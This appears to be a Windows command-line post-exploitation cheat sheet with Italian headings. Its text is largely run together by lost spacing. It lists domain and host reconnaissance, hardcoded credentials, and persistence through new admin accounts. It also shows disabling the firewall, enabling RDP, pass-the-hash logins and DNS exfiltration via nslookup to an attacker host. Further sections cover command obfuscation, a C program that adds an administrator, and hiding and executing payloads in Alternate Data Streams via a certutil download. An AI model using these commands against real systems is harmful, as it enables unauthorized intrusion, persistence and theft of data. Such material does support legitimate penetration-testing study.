wmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get architecturesysteminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmiccomputersystemLISTfull#Get PC infowmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicqfelistbrief#UpdateshostnameDRIVERQUERY#3rd party driver vulnerable?
Ambiente
set#List all environment variables
Alcune variabili d'ambiente da evidenziare:
COMPUTERNAME: Nome del computer
TEMP/TMP: Cartella temporanea
USERNAME: Il tuo nome utente
HOMEPATH/USERPROFILE: Directory home
windir: C:\Windows
OS: Windows OS
LOGONSERVER: Nome del controller di dominio
USERDNSDOMAIN: Nome di dominio da utilizzare con DNS
USERDOMAIN: Nome del dominio
nslookup%LOGONSERVER%.%USERDNSDOMAIN%#DNS request for DC
schtasks/query/foLIST/v#Verbose out of scheduled tasksschtasks/query/foLIST2>nul|findstrTaskNameschtasks/query/foLIST/v>schtasks.txt; catschtask.txt|grep"SYSTEM\|Task To Run"|grep-B1SYSTEMtasklist/V#List processestasklist/SVC#links processes to started servicesnetstart#Windows Services startedwmicservicelistbrief#List servicesscquery#List of servicesdir/a"C:\Program Files"#Installed softwaredir/a"C:\Program Files (x86)"#Installed softwareregqueryHKEY_LOCAL_MACHINE\SOFTWARE#Installed software
Informazioni sul dominio
# Generic AD infoecho%USERDOMAIN%#Get domain nameecho%USERDNSDOMAIN%#Get domain nameecho%logonserver%#Get name of the domain controllersetlogonserver#Get name of the domain controllersetlog#Get name of the domain controllergpresult/V# Get current policy appliedwmicntdomainlist/format:list#Displays information about the Domain and Domain Controllers# Usersdsqueryuser#Get all usersnetuser/domain#List all users of the domainnetuser<ACCOUNT_NAME>/domain#Get information about that usernetaccounts/domain#Password and lockout policywmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic/NAMESPACE:\\root\directory\ldapPATHds_userGETds_samaccountname#Get all userswmic/NAMESPACE:\\root\directory\ldapPATHds_userwhere"ds_samaccountname='user_name'"GET# Get info of 1 userswmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groupsnetgroup/domain#List of domain groupsnet localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
netgroup"Domain Admins"/domain#List users with domain admin privilegesnetgroup"domain computers"/domain#List of PCs connected to the domainnetgroup"Domain Controllers"/domain#List PC accounts of domains controllerswmicgrouplist/format:list# Information about all local groupswmic/NAMESPACE:\\root\directory\ldapPATHds_groupGETds_samaccountname#Get all groupswmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computersdsquerycomputer#Get all computersnetview/domain#Lis of PCs of the domainnltest/dclist:<DOMAIN>#List domain controllerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_samaccountname#All computerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_dnshostname#All computers# Trust relationsnltest/domain_trusts#Mapping of the trust relationships# Get all objects inside an OUdsquery*"CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
Registri ed Eventi
#Make a security query using another credentialswevtutilqesecurity/rd:true/f:text/r:helpline/u:HELPLINE\zachary/p:0987654321
Utenti e Gruppi
Utenti
#Mewhoami/all#All info about me, take a look at the enabled tokenswhoami/priv#Show only privileges# Local usersnetusers#All usersdir/b/ad"C:\Users"netuser%username%#Info about a user (me)netaccounts#Information about password requirementswmicUSERACCOUNTGetDomain,Name,Sidnetuser/add [username] [password] #Create user# Other users loogedqwinsta#Anyone else logged in?#Lauch new cmd.exe with new creds (to impersonate in network)runas/netonly/user<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Check current logon session as administrator using logonsessions from sysinternalslogonsessions.exelogonsessions64.exe
Gruppi
#Localnetlocalgroup#All available groupsnetlocalgroupAdministrators#Info about a group (admins)netlocalgroupadministrators [username] /add #Add user to administrators#Domainnetgroup/domain#Info about domain groupsnetgroup/domain<domain_group_name>#Users that belongs to the group
Elenca le sessioni
qwinsta
klist sessions
Politica delle Password
net accounts
Credenziali
cmdkey/list#List credentialvaultcmd/listcreds:"Windows Credentials"/all#List Windows vaultrundll32keymgr.dll,KRShowKeyMgr#You need graphical access
Persistenza con gli utenti
# Add domain user and put them in Domain Admins groupnetuserusernamepassword/ADD/DOMAINnetgroup"Domain Admins"username/ADD/DOMAIN# Add local user and put them local Administrators groupnetuserusernamepassword/ADDnetlocalgroupAdministratorsusername/ADD# Add user to insteresting groups:netlocalgroup"Remote Desktop Users"UserLoginName/addnetlocalgroup"Debugger users"UserLoginName/addnetlocalgroup"Power users"UserLoginName/add
Rete
Interfacce, Rotte, Porte, Host e DNSCache
ipconfig/all#Info about interfacesrouteprint#Print available routesarp-a#Know hostsnetstat-ano#Opened ports?typeC:\WINDOWS\System32\drivers\etc\hostsipconfig/displaydns|findstr"Record"|findstr"Name Host"
Firewall
netshfirewallshowstate# FW info, open portsnetshadvfirewallfirewallshowrulename=allnetshfirewallshowconfig# FW infoNetshAdvfirewallshowallprofilesNetShAdvfirewallsetallprofilesstateoff#Turn OffNetShAdvfirewallsetallprofilesstateon#Trun Onnetshfirewallsetopmodedisable#Turn Off#How to open portsnetshadvfirewallfirewalladdrulename="NetBIOS UDP Port 138"dir=outaction=allowprotocol=UDPlocalport=138netshadvfirewallfirewalladdrulename="NetBIOS TCP Port 139"dir=inaction=allowprotocol=TCPlocalport=139netshfirewalladdportopeningTCP3389"Remote Desktop"#Enable Remote Desktopreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netshfirewalladdportopeningTCP3389"Remote Desktop"::netshfirewallsetserviceremotedesktopenable#I found that this line is not needed::scconfigTermServicestart=auto#I found that this line is not needed::netstartTermservice#I found that this line is not needed#Enable Remote Desktop with wmicwmicrdtogglewhereAllowTSConnections="0"callSetAllowTSConnections"1"##orwmic/node:remotehostpathWin32_TerminalServiceSettingwhereAllowTSConnections="0"callSetAllowTSConnections"1"#Enable Remote assistance:regadd“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer”/vfAllowToGetHelp/tREG_DWORD/d1/fnetshfirewallsetserviceremoteadminenable#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::ConnecttoRDP (using hashorpassword)xfreerdp/u:alice/d:WORKGROUP/pth:b74242f37e47371aff835a6ebcac4ffe/v:10.11.1.49xfreerdp/u:hacker/d:WORKGROUP/p:Hacker123!/v:10.11.1.49
Condivisioni
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
cd#Get current dircdC:\path\to\dir#Change dirdir#List current dirdir/a:hC:\path\to\dir#List hidden filesdir/s/b#Recursive list without shittime#Get current timedate#Get current dateshutdown/r/t0#Shutdown nowtype<file>#Cat file#Runasrunas/savecred/user:WORKGROUP\Administrator"\\10.XXX.XXX.XXX\SHARE\evil.exe"#Use saved credentialsrunas/netonly/user:<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Hideattrib+hfile#Set Hiddenattrib-hfile#Quit Hidden#Give full control over a file that you ownsicacls<FILE_PATH>/t/e/p<USERNAME>:Ficacls<FILE_PATH>/e/r<USERNAME>#Remove the permision#Recursive copy to smbxcopy/hievryC:\Users\security\.yawcam \\10.10.14.13\name\win#exe2bat to transform exe file in bat file#ADSdir/r#Detect ADSmorefile.txt:ads.txt#read ADSpowershell (Get-Content file.txt-Streamads.txt)# Get error messages from codenethelpmsg32#32 is the code in that case
Bypass Char Blacklisting
echo%HOMEPATH:~6,-11%#\who^ami#whoami
DOSfuscation
Genera una riga CMD offuscata
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.gitcd Invoke-DOSfuscationImport-Module .\Invoke-DOSfuscation.psd1Invoke-DOSfuscationhelpSET COMMAND type C:\Users\Administrator\Desktop\flag.txtencoding
for /f tokens tecnica: Questo ci consente di eseguire comandi, ottenere le prime X parole di ogni riga e inviarle tramite DNS al nostro server
for /f %a in ('whoami') do nslookup %a <IP_kali>#Get whoamifor /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali>#Get word2for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali>#List folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali>#List that folderfor /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali>#Same as last one#More complex commandsfor /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
Puoi anche reindirizzare l'output e poi leggerlo.
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
Chiamare CMD da codice C
#include<stdlib.h>/* system, NULL, EXIT_FAILURE */// When executed by Administrator this program will create a user and then add him to the administrators group// i686-w64-mingw32-gcc addmin.c -o addmin.exe// upx -9 addmin.exeintmain (){int i;i=system("net users otherAcc 0TherAcc! /add");i=system("net localgroup administrators otherAcc /add");return0;}
Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
## Selected Examples of ADS Operations ##### Adding Content to ADS #### Append executable to a log file as an ADStypeC:\temp\evil.exe>"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"# Download a script directly into an ADScertutil.exe-urlcache-split-fhttps://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1c:\temp:ttt### Discovering ADS Content #### List files and their ADSdir/R# Use Sysinternals tool to list ADS of a filestreams.exe<c:\path\to\file>### Extracting Content from ADS #### Extract an executable stored in an ADSexpandc:\ads\file.txt:test.exec:\temp\evil.exe### Executing ADS Content #### Execute an executable stored in an ADS using WMICwmicprocesscallcreate'"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'# Execute a script stored in an ADS using PowerShellpowershell-epbypass-<c:\temp:ttt